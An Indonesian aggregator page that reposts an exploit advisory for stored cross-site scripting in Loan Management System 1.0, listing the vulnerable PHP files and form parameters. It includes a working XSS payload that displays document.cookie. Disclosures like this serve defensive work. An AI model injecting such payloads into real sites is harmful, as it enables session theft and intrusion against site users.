Sistem Manajemen Pinjaman 1.0 Cross Site Scripting

  • Whatsapp
Zucchetti Axess Kontrol Akses CLOKI 1.64 Pemalsuan Permintaan Situs Lintas
Zucchetti Axess Kontrol Akses CLOKI Pemalsuan Permintaan Situs Lintas

News.nextcloud.asia

Sistem Manajemen Pinjaman versi 1.0 mengalami kerentanan skrip lintas situs yang persisten.

SHA-256 | 44b807c10851b4db74cc02ac40db2bbe66fd7376b59011a5c95ab7a8d9bd232b

# Exploit Title: Loan Management System - Stored XSS on several parameters
# Date: 28/07/2022
# Exploit Author: saitamang
# Vendor Homepage: sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL

There are several functions and parameter affected as below:

addUser.php
- firstname
- lastname

save_ltype.php
- ltype_name
- ltype_desc

save_borrower.php
- firstname
- middlename
- lastname
- address

The payload use to inject is "/><svg/onload=alert(document.cookie)>

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.